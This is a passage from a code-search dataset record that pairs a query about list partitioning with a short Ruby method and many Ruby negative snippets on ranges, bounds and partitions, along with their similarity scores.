"0.6399381",
"0.6349612",
"0.62588686",
"0.6254483",
"0.6244712",
"0.62080765",
"0.62066627",
"0.61895996",
"0.61192626",
"0.61116827",
"0.6065698",
"0.5983066",
"0.5977896",
"0.58864456",
"0.58864456",
"0.58670485",
"0.58634937",
"0.5829765",
"0.58295244",
"0.5826287",
"0.5807269",
"0.57971734",
"0.5788579",
"0.57813066",
"0.57813066",
"0.57783777",
"0.5753838",
"0.57507",
"0.5739273",
"0.57259023",
"0.57259023",
"0.5709252",
"0.5685153",
"0.567869",
"0.56705457",
"0.5650436",
"0.5630738",
"0.5618182",
"0.5616466",
"0.5609898",
"0.5586828",
"0.557924",
"0.55782866",
"0.5571625",
"0.5549059",
"0.55483216",
"0.5544486",
"0.5543351",
"0.5542388",
"0.55332893",
"0.552464",
"0.5523531",
"0.55144787",
"0.54985976",
"0.5495805",
"0.54803014",
"0.5478239",
"0.5459564",
"0.5458796",
"0.5454088",
"0.54518783",
"0.5446221",
"0.5446221",
"0.54452914",
"0.54424614",
"0.54413784",
"0.54323006",
"0.5431522",
"0.5410785",
"0.5401641",
"0.5401583",
"0.5398301",
"0.5392312",
"0.53894955",
"0.5387205",
"0.53723204",
"0.53695905",
"0.53679675",
"0.53608763",
"0.53498113",
"0.5347985",
"0.5347985",
"0.5347985",
"0.5344269",
"0.53399533",
"0.53294367",
"0.5321101",
"0.5316585",
"0.53061503",
"0.5299774",
"0.52981824"
] |
0.0
|
-1
|
Assumes range partitioning, sets the exclusive maximum value of the range for this partition.
|
def to(*v)
@to = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def max_range=(range)\n @max_range = [0, range].max\n @min_range = [@min_range, @max_range].min\n end",
"def set_max( max )\n if IntegerOption.bounds_ok?( @min, max )\n @max = max\n else\n @max = nil\n raise \"invalid upper bound: #{ max.to_s }\"\n end\n end",
"def max\r\n @range.max\r\n end",
"def max\n @range.end\n end",
"def min_range=(range)\n @min_range = [0, range].max\n @max_range = [@min_range, @max_range].max\n end",
"def max(upper_bound, inclusive = nil)\n @max = upper_bound\n @max_inclusive = inclusive\n end",
"def max(upper_bound, inclusive = nil)\n @max = upper_bound\n @max_inclusive = inclusive\n end",
"def set_Maximum(value)\n set_input(\"Maximum\", value)\n end",
"def get_max_range\n return @maxRange\n end",
"def set_max(max)\n self[:max] = (max > 0 ? max : 1)\n end",
"def max\n @max ||= define_min_and_max && @max\n end",
"def max\n if @end.nil?\n ::Kernel.raise ::RangeError, 'cannot get the maximum of endless range'\n elsif block_given?\n super\n elsif !@begin.nil? && (@begin > @end ||\n @excl && @begin == @end)\n nil\n else\n `#{@excl} ? #{@end} - 1 : #{@end}`\n end\n end",
"def maximum=(value)\n @maximum = value\n end",
"def max(value)\n opts[:max] = value\n end",
"def range=(range)\n @range = range\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def max=(value)\r\n @max = value\r\n shift while @store.length > @max\r\n end",
"def range\n @range ||= set_range\n end",
"def setLowHigh(low, high)\n # Make sure the values aren't out of bounds.\n if low <= high\n @low = low\n @high = high\n elsif low > high\n @low = high\n @high = low\n end\n\n # Make sure the user hasn't done something silly.\n self.limitCurrentValue\n end",
"def range=(range)\n @range = range\n end",
"def set_value( value )\n if value == nil\n return\n end\n \n value = value.to_i\n \n satisfying_min = ((get_min == nil) or ((get_min != nil) and (get_min <= value)))\n satisfying_max = ((get_max == nil) or ((get_max != nil) and (value <= get_max)))\n \n if satisfying_min and satisfying_max\n @value = value\n else\n raise \"integer value out of range: #{ value.to_s }\"\n end\n end",
"def max=(max)\n diff = nil\n @mutex.synchronize {\n if max <= @max\n @max = max\n else\n diff = max - @max\n @max = max\n end\n }\n if diff\n diff.times do\n\tbegin\n\t t = @queue_wait.shift\n\t t.run if t\n\trescue ThreadError\n\t retry\n\tend\n end\n end\n max\n end",
"def max=(max)\n diff = nil\n @mutex.synchronize {\n if max <= @max\n @max = max\n else\n diff = max - @max\n @max = max\n end\n }\n if diff\n diff.times do\n\tbegin\n\t t = @queue_wait.shift\n\t t.run if t\n\trescue ThreadError\n\t retry\n\tend\n end\n end\n max\n end",
"def enlarge(growth)\r\n if @range.none?\r\n @range = 0...growth\r\n else\r\n @range = (@range.min)..(@range.max + growth)\r\n end\r\n end",
"def range\n @range ||= 0.upto(@limit)\n end",
"def max=(value)\n MSPhysics::Newton::Hinge.set_max(@address, value)\n end",
"def max=\n end",
"def get_upper_limit_of(range)\n range.max\nend",
"def item_max=(value)\n @item_max = value\n end",
"def SetRange(range)\n @range=range\n end",
"def range=(range)\n @range = Range.new(range)\n end",
"def update(range)\n @access.update(range.min, range.max)\n end",
"def get_upper_limit_of(range)\n range.max\nend",
"def upto(end_key)\n unless partition_specified?\n raise IllegalQuery,\n \"Can't construct exclusive range on partition key #{range_key_name}\"\n end\n scoped(upper_bound: bound(false, true, end_key))\n end",
"def high\n @range_high\n end",
"def range=(aRange)\n range.assign(aRange)\n end",
"def max\n [self.begin, self.end].max\n end",
"def clamp(value, minimum_inclusive, maximum_inclusive)\n\n if minimum_inclusive > maximum_inclusive\n\n swap = minimum_inclusive\n\n minimum_inclusive = maximum_inclusive\n maximum_inclusive = swap\n end\n\n value < minimum_inclusive ? minimum_inclusive : value < maximum_inclusive ? value : maximum_inclusive\n end",
"def range(range)\n opts[:min] = range.begin\n opts[:max] = range.end\n end",
"def position_max=(new_position_max)\n Klass.setPositionMax(@handle, @index, new_position_max.to_f)\n new_position_max\n end",
"def max_range(array)\n \nend",
"def unbounded\n ::Unbounded::Range.new(self.min, self.max, exclude_end?)\n end",
"def update!(**args)\n @max_value = args[:max_value] if args.key?(:max_value)\n @min_value = args[:min_value] if args.key?(:min_value)\n end",
"def update!(**args)\n @max_value = args[:max_value] if args.key?(:max_value)\n @min_value = args[:min_value] if args.key?(:min_value)\n end",
"def effective_maximum\n maximum_bound ? maximum_bound.value : Infinity\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def SetIDRange(min, max)\n assert { min.instance_of?(Fixnum) or min.instance_of?(Bignum) }\n assert { max.instance_of?(Fixnum) or max.instance_of?(Bignum) }\n assert { min <= max }\n\n @min_id = min\n @max_id = max\n end",
"def range\n object.range + DEFAULT_MAX_DISTANCE\n end",
"def vote_range=(val)\n raise ArgumentError, 'argument should be a Range' unless val.is_a?(Range)\n @vote_range = val\n end",
"def restrict(value, range)\n [[value, range.first].max, range.last].min\n end",
"def set(max, position)\n @max = max\n @number = 1\n @cursor_y = position\n refresh\n end",
"def set_bounds( min, max )\n set_min( min )\n set_max( max )\n end",
"def max_range(array)\r\n\r\n array.max - array.min # max and min methods used\r\nend",
"def maximized(value)\n @ole.Maximized = value\n nil\n end",
"def maximized(value)\n @ole.Maximized = value\n nil\n end",
"def max\n if valid?\n max_value\n end\n end",
"def set_max_min(grouplisthash)\n @maxscore.each do |scorekey, val|\n @chromhash.each do |chrnum, chrom|\n chrom.snp_list.snps.each do |snp|\n snp.results.each do |groupname, res|\n if groupname !~ /:/\n currgroup = grouplisthash[GroupList.get_default_name].grouphash[groupname]\n else\n namepcs = groupname.split /:/\n currgroup = grouplisthash[namepcs[1]].grouphash[groupname]\n end\n\n if (scorekey =~ /beta/i and currgroup.has_beta?) or scorekey !~ /beta/i\n if res.values[scorekey] !~ /\\d/\n next\n end\n if res.values[scorekey].to_f > @maxscore[scorekey].to_f\n @maxscore[scorekey] = res.values[scorekey]\n end\n if res.values[scorekey].to_f < @minscore[scorekey].to_f\n @minscore[scorekey] = res.values[scorekey]\n end\n end\n end\n end\n end\n end\n end",
"def max_energy=(energy)\n @max_energy = [0, energy].max\n end",
"def check_new_max(product)\n if product > @max\n @max = product\n end \nend",
"def max_health=(health)\n diff = [health - @max_health, 0].max\n @max_health = [health, 0].max\n @cur_health = [@cur_health + diff, @max_health].min\n end",
"def set_MaxEntries(value)\n set_input(\"MaxEntries\", value)\n end",
"def replace_max(value, priority=value, subpriority=nil)\n subpriority ||= @totalcount\n @totalcount += 1\n loc = find_max_locator\n loc.update(value, priority, subpriority)\n loc\n end",
"def upper_bound_inclusive\n result = upper_bound\n\n # Some special cases:\n # - return a semver \"off-the-charts\" if the upper bound is 0.0.0\n # - deal with ranges that are not really ranges (like =v1.2.3)\n # - The \"biggest semver\" is its own upper bound\n return IMPOSSIBLY_SMALLEST_SEMVER if result.to_a[0...3] == [0, 0, 0]\n return result if upper_bound == lower_bound\n return result if result == XSemVer::BIGGEST_SEMVER\n\n # Figure out the part to decrement, taking care that we can't decrement\n # a part that is already at 0\n index_to_decrement = 2\n while result.to_a[index_to_decrement] == 0 do\n index_to_decrement -= 1\n end\n\n part_to_decrement = [:major, :minor, :patch][index_to_decrement]\n\n # Dynamically decrement the specified part\n value = result.send(part_to_decrement) - 1\n result.send \"#{part_to_decrement}=\", value\n\n # All the parts following the decremented one will be set to infinity\n parts_to_set_to_infinity = [:major, :minor, :patch][index_to_decrement + 1...3]\n\n parts_to_set_to_infinity.each do |part|\n result.send \"#{part}=\", FIXNUM_MAX\n end\n\n result\n end",
"def within_size_range=(value)\n @within_size_range = value\n end",
"def range(min, max)\n return max if max < min\n range(min, max) << max\nend",
"def set_rating_range range = nil\n raterange = case range\n when Array\n arr = range.sort\n Range.new arr.first, arr.last\n when Range\n range\n when nil\n (1..5)\n else\n raise ArgumentError, \"Must be a range, was: #{range}\"\n end\n\n (class << self; self; end).send(:define_method, :rating_range) do\n raterange\n end\n end",
"def max; end",
"def max; end",
"def maxvalue\n MAXVALUE\n end",
"def change_ranges(params)\n @min = params.fetch(:min, 0).to_f\n @max = params.fetch(:max, 100).to_f\n end",
"def update_range\n @min = [@guess + 1, @max].min if @guess < @answer\n\n @max = [@guess - 1, @min].max if @guess >= @answer\n \n return\n end",
"def set_LastYearRange(value)\n set_input(\"LastYearRange\", value)\n end",
"def set_LastYearRange(value)\n set_input(\"LastYearRange\", value)\n end",
"def set_LastYearRange(value)\n set_input(\"LastYearRange\", value)\n end",
"def zremrangebyscore(key, min, max); end",
"def zremrangebyscore(key, min, max); end",
"def max_tb_rangeF; @max_sf; end",
"def m_range\r\n end",
"def minmax\n [min, unbounded? ? INFINITY : max]\n end",
"def set(item, max)\n @item = item\n @max = max\n @number = 1\n refresh\n end",
"def set_cluster_group_ranges\n if self.file_type == 'Cluster' && self.cluster_groups.any?\n cluster = self.cluster_groups.first\n # check if range values are present and set accordingly\n if !self.x_axis_min.nil? && !self.x_axis_max.nil? && !self.y_axis_min.nil? && !self.y_axis_max.nil?\n domain_ranges = {\n x: [self.x_axis_min, self.x_axis_max],\n y: [self.y_axis_min, self.y_axis_max]\n }\n if !self.z_axis_min.nil? && !self.z_axis_max.nil?\n domain_ranges[:z] = [self.z_axis_min, self.z_axis_max]\n end\n cluster.update(domain_ranges: domain_ranges)\n else\n # either user has not supplied ranges or is deleting them, so clear entry for cluster_group\n cluster.update(domain_ranges: nil)\n end\n end\n end",
"def get_max\n @max ||= calculate_max\n end",
"def clamp(val, min, max)\n\treturn min if val < min\n\treturn max if val > max\n\treturn val\nend",
"def update!(**args)\n @exclusive_maximum = args[:exclusive_maximum] if args.key?(:exclusive_maximum)\n @exclusive_minimum = args[:exclusive_minimum] if args.key?(:exclusive_minimum)\n @maximum = args[:maximum] if args.key?(:maximum)\n @minimum = args[:minimum] if args.key?(:minimum)\n end",
"def get_upper_limit_of(range)\n range.last\nend"
] |
[
"0.7247103",
"0.6731997",
"0.6690845",
"0.6576741",
"0.65313303",
"0.6524582",
"0.6524582",
"0.64506906",
"0.63527775",
"0.632476",
"0.62763554",
"0.6214056",
"0.6212238",
"0.6170544",
"0.6155219",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.6070612",
"0.6056904",
"0.6033674",
"0.6022585",
"0.5950167",
"0.5919765",
"0.5919765",
"0.59154564",
"0.5897935",
"0.5881222",
"0.5871674",
"0.5867126",
"0.58622926",
"0.5860082",
"0.5860026",
"0.58464134",
"0.5837987",
"0.58075523",
"0.57855535",
"0.57629216",
"0.5740042",
"0.57272285",
"0.57163244",
"0.57092637",
"0.57058203",
"0.5687706",
"0.5679261",
"0.5675895",
"0.5655217",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5647969",
"0.5647969",
"0.5647861",
"0.56455386",
"0.56416047",
"0.5608837",
"0.560871",
"0.5606977",
"0.5583639",
"0.55779123",
"0.55779123",
"0.55755484",
"0.5571267",
"0.5558885",
"0.5513895",
"0.5512015",
"0.5505471",
"0.549946",
"0.54963565",
"0.5495369",
"0.5453825",
"0.54450107",
"0.5440428",
"0.5440428",
"0.5435354",
"0.5432699",
"0.54207766",
"0.54170895",
"0.54170895",
"0.54170895",
"0.541566",
"0.541566",
"0.54126626",
"0.5403936",
"0.5399133",
"0.538272",
"0.5375385",
"0.53692997",
"0.53682595",
"0.53667915",
"0.536129"
] |
0.0
|
-1
|
Assumes list partitioning, sets the values to be included in this partition.
|
def values_in(*v)
@in = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def partition_list()\nend",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def set(values); end",
"def set(partition, field, value)\n partition = deep_copy(partition)\n value = deep_copy(value)\n AutoinstCommon.set(@fields, partition, field, value)\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def on_partitions_assigned(_, partitions)\n @assigned_partitions = partitions.to_h.transform_values { |part| part.map(&:partition) }\n @changed = true\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def assign_parts(hash={})\n return if hash.nil? or hash == {}\n self.parts = []\n hash ||= {}\n hash.each do |h|\n i = self.vendor.items.visible.find_by_sku(h[:sku])\n if i then\n i.is_part = true\n i.part_quantity = self.string_to_float(h[:part_quantity])\n result = i.save\n if result == false\n raise \"Could not save Item because #{ i.errors.messages }\"\n end\n self.parts << i\n end\n end\n result = self.save\n if result == false\n raise \"Could not save Item because #{ self.errors.messages }\"\n end\n end",
"def sort!\n @list = Hash[@list.sort_by {|partition_name, partition| partition}]\n self\n end",
"def partition_linked_list(linked_list, partition_value)\n test_node = linked_list.head.next\n until test_node.next.value == nil\n if test_node.value < partition_value\n next_node = test_node.next\n linked_list.prepend(test_node.value)\n linked_list.remove(test_node)\n test_node = next_node\n else\n test_node = test_node.next\n end\n end\n linked_list\nend",
"def set_values(*items)\r\n items = *items\r\n @value = [nil]\r\n items.each do |item|\r\n @value.push(item)\r\n end\r\n end",
"def update!(**args)\n @partition_count = args[:partition_count] if args.key?(:partition_count)\n end",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def ___set_includes\n ___upd_valid\n each_value do |item|\n next unless (ary = item.delete(:include))\n ary.each do |ref|\n item.get(:group) { Hashx.new }.update(self[ref][:group])\n end\n end\n end",
"def partition(list, left, right, pivotIndex)\n pivotValue = list[pivotIndex]\n list[pivotIndex], list[right] = list[right], list[pivotIndex]\n storeIndex = left\n for i in (left...right) do\n if list[i] < pivotValue\n list[storeIndex], list[i] = list[i], list[storeIndex]\n storeIndex += 1\n end\n end\n list[right], list[storeIndex] = list[storeIndex], list[right]\n storeIndex\nend",
"def set_value_list\n @value_list = ValueList.find(params[:id])\n end",
"def set_list(list)\n @item_list = list\n end",
"def propagate_to_existing_lists=(value)\n @propagate_to_existing_lists = value\n end",
"def assign(config, values)\n if key\n nest_config = nest(config)\n\n unless assigned\n nest_config[key] = []\n end\n\n array = (nest_config[key] ||= [])\n array.concat(values)\n end\n\n @assigned = true\n config\n end",
"def sort_by_site_range!\n @list = Hash[@list.sort_by {|partition_name, partition| partition.sites}]\n self\n end",
"def update!(**args)\n @partition_key = args[:partition_key] if args.key?(:partition_key)\n end",
"def []=(*key_list, value)\n store_with_init(Array(key_list).flatten, value)\n end",
"def list=(pl)\n\n list = get_list\n\n list['list'] = pl.collect { |e|\n ParticipantEntry.read(e)\n }.collect { |e|\n e[0] = e[0].source if e[0].is_a?(Regexp)\n e\n }\n\n if r = @context.storage.put(list)\n #\n # put failed, have to redo it\n #\n self.list=(pl)\n end\n end",
"def list=(value)\n @list = value\n end",
"def add_to_partition(cand, match, partition)\n if !match.nil?\n partition[match] << cand\n @ident_viol_candidates = true\n else\n partition << [cand]\n end\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n PropertyGroup::PathList.new.import(result[0]),\n PropertyGroup::PathList.new.import(result[1]),\n ]\n end",
"def including_topics_list=(names)\n self.includes_topics.clear\n names.split(',').each do |name|\n topic = Topic.find_by_name(name.downcase.strip)\n self.includes_topics << topic if topic\n end\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition(&block)\n return to_enum :partition unless block\n\n ary_T = []\n ary_F = []\n self.each{|*val|\n if block.call(*val)\n ary_T.push(val.__svalue)\n else\n ary_F.push(val.__svalue)\n end\n }\n [ary_T, ary_F]\n end",
"def set(list, list_size, numbers, highlight, box)\n self.setItems(list, list_size, numbers)\n self.setHighlight(highlight)\n self.setBox(box)\n end",
"def sites\n @list.map {|partition_name, partition| partition.sites.map {|site| {site => partition_name} }}.flatten(1)\n end",
"def setList( list)\n @groupList = list\n # calculate minimum bbox to contain the list\n b = @groupList[0].bbox\n @groupList.each { |i| b = self.unite( b, i.bbox) }\n\n # turn off item bindings for items in group\n bindings = self.getBindings\n @groupList.each { |i|\n bindings.each { |p| i.bind p[0], proc { |event| } } # the null proc ...\n }\n\n\t\t# add the UONGroupingBox tag to each of the contained items\n\t\tc = editor.getModelCanvas\n\t\tc.addtag_enclosed( self.gettag, b[0], b[1], b[2], b[3])\n\n # establish bbox of group\n self.coords( b[0], b[1], b[2], b[3])\n outline \"purple\"\n\t\tputs \"LEAVE setList of #{self}\"\n end",
"def call(value)\n coerced = value.map { |item| super(item) }\n\n @set ? Set.new(coerced) : coerced\n end",
"def update!(**args)\n @values = args[:values] if args.key?(:values)\n @pivot_value_regions = args[:pivot_value_regions] if args.key?(:pivot_value_regions)\n end",
"def sort_by_sites!\n @list = Hash[@list.sort_by {|partition_name, partition| partition.sites.size}]\n self\n end",
"def partition(linkedlist, x)\n # Use select block function to create arrays with correct values\n lessThanX = linkedlist.select { |val| val < x }\n moreThanX = linkedlist.select { |val| val >= x }\n # Return values greater than or equal to x appended to values lesser than x\n return lessThanX + moreThanX\nend",
"def greedy2_fill!(remaining_partitions)\n remaining_partitions.each do |src_partition|\n src_partition.sites.each do |site|\n\n smallest_bin = self.update_bin_sizes!.min\n target_partition = smallest_bin.list[src_partition.name]\n if target_partition.nil?\n smallest_bin.add!([Partition.new(src_partition.name, [site], src_partition.tree)])\n else\n target_partition.incr_add_sites!([site])\n end\n\n end\n end\n end",
"def bins_with_partition(partition_name)\n @list.select { |bin| bin.has_partition?(partition_name) }\n end",
"def list_values(bn, lists)\n raise \"no list\" unless lists.has_key?(bn)\n first, rest = lists[bn][RDF.first], lists[bn][RDF.rest]\n (rest == RDF.nil ? [] : list_values(rest, lists)).unshift(first)\n rescue\n lists.delete(bn)\n raise $!\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def variants_multiply_properties(list)\n return if list.empty?\n keys = list.first.keys\n raise \"Must have same properties\" unless list.collect { |h| h.keys }.uniq.length == keys.length\n raise \"Must have unique list\" unless list.uniq.length == list.length\n self.variants = self.variants.collect do |vd|\n list.collect do |h|\n v = vd.dup\n if num = keys.delete('supplier_num')\n v.supplier_num = num\n elsif post = keys.delete('postfix')\n v.supplier_num += post\n else\n v.supplier_num += keys.collect { |k| \"-#{h[k]}\" }.join\n end\n v.properties = v.properties.merge(h)\n v\n end\n end.flatten\n end",
"def update!(**args)\n @per_partition_bytes = args[:per_partition_bytes] if args.key?(:per_partition_bytes)\n @period = args[:period] if args.key?(:period)\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def crop!(crop_partitions, crop_sites_per_partition)\n @list = Hash[@list.first(crop_partitions)]\n @list = Hash[@list.map do |partition_name, partition|\n [partition_name, partition.crop(crop_sites_per_partition - Random.rand(0..2))]\n end]\n end",
"def value_list_params\n params.require(:value_list).permit(:name, :value_items)\n end",
"def split_partitions\n partition_names = @list.map { |bin| bin.partition_names }.flatten\n partition_names.select { |name| partition_names.index(name) != partition_names.rindex(name) }.uniq\n end",
"def compact!\n @list.delete_if {|partition_name, partition| partition.sites.size == 0}\n end",
"def partition(linked_list, x)\n pre_list = LinkedList.new\n equal_list = LinkedList.new\n post_list = LinkedList.new\n\n linked_list.each do |node|\n if node.val < x\n pre_list.append(nil,node.val)\n elsif node.val == x\n equal_list.append(nil,x)\n else\n post_list.append(nil,node.val)\n end\n end\n\n equal_list.each do |node|\n pre_list.append(nil, node.val)\n end\n\n post_list.each do |node|\n pre_list.append(nil, node.val)\n end\n\n pre_list.to_s\nend",
"def original_scheduling_initial!(partitions)\n # Phase 1: Sort partitions by sites.size\n partitions.sort_by_sites!\n\n # Phase 2: Initial filling\n bin_assigner = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_assigner].total_sites + partitions.first.sites.size <= @sites_lower_bound\n @list[bin_assigner].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_assigner].total_sites == @sites_lower_bound\n full_bins += 1\n @sites_lower_bound -= 1 if full_bins == @list.size - @sites_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_assigner = (bin_assigner + 1) % @list.size\n end\n partitions\n end",
"def cluster_ids=(ids)\n ids.each do |cluster_id|\n cluster = Cluster.find cluster_id\n self.nodes << cluster.nodes\n end\n end",
"def partition(list, left, right)\n pivot = list[right]\n previous_left = left-1\n left.upto(right-1) { |value|\n previous_left = previous_left + 1 if list[value] <= pivot\n list[previous_left], list[value] = list[value], list[previous_left] if list[value] <= pivot\n }\n list[previous_left+1], list[right] = list[right], list[previous_left+1]\n return previous_left + 1\nend",
"def partition list, x\n # TODO implement size property in list class\n cur = list.head\n size = 0\n while cur != nil\n size += 1\n cur = cur.nxt\n end\n\n cur = list.head\n i = 0\n while i < size\n mv = cur\n list.remove(i)\n if mv.node < x\n list.insert(mv.node, 0)\n else\n list.insert(mv.node, size - 1)\n end\n cur = cur.nxt\n i += 1\n end\n\n return list\nend",
"def set(enumerable); end",
"def select_values values\n return unless values\n values.each do |val|\n row = @list.index val\n add_row_selection_interval row, row unless row.nil?\n end\n end",
"def _refresh_set_values(h)\n @values = h\n end",
"def _refresh_set_values(h)\n @values = h\n end",
"def embed_property_value_list( property_value_list )\n count = 1 \n property_value_list.each do |property_value_pair|\n PropertyValue.create(:item_id => self.id, \n :property_id => property_value_pair[:property_id],\n :value_id => property_value_pair[:value_id],\n :position => count)\n count += 1 \n end\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def partitionList list, x\n prev = list.head\n node = prev.next\n\n while node\n if (node.val < x)\n prev.next = node.next\n node.next = list.head\n list.head = node\n node = prev.next\n else\n prev = prev.next\n node = prev ? prev.next : nil\n end\n end\nend",
"def values=(collection)\n @values = collection\n end",
"def set v\n if multiple?\n raise \"wrong number of values (#{v.length} for #{@min_count}..#{@max_count})\" if (v.length < min_count) || (max_count != :unlimited && v.length > max_count)\n @value = v.map {|w| single_value w }\n else\n @value = single_value v\n end\n self\n end",
"def set(index, val)\n \n end",
"def initialize_list\n Array(value.value).each_with_index do |val, index|\n ordered_list.insert_proxy_for_at(index, calling_mapper.for(Property.new(value.subject, :member_id, val, value.adapter, value.resource)).result.value)\n end\n end",
"def set(list, list_size, filler_char, highlight, box)\n self.setContents(list, list_size)\n self.setFillerChar(filler_char)\n self.setHighlight(highlight)\n self.setBox(box)\n end",
"def values=(value)\n @values = value\n end",
"def values=(value)\n @values = value\n end",
"def values=(value)\n @values = value\n end",
"def add_tree!(tree, compute = true)\n @list.each_value do |partition|\n partition.add_tree!(tree, compute)\n end\n self\n end",
"def adapted_scheduling_initial!(partitions)\n bin_index = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_index].size + partitions.first.size <= @operations_lower_bound\n @list[bin_index].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_index].size == @operations_lower_bound\n full_bins += 1\n @operations_lower_bound -= 1 if full_bins == @list.size - @operations_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_index = (bin_index + 1) % @list.size\n end\n @list = @list.sort\n\n partitions\n end",
"def set\n @items.each do |d|\n eval d.rubify\n end\n end",
"def update_for=(list)\n build_package_association_assignment(:update_for_items,list)\n end",
"def refine_permitted_params(param_list)\n res = param_list.dup\n\n ms_keys = res.select { |a| columns_hash[a.to_s]&.array }\n ms_keys.each do |k|\n res.delete(k)\n res << { k => [] }\n end\n\n res\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n self.class.new.import(result[0]),\n self.class.new.import(result[1]),\n ]\n end",
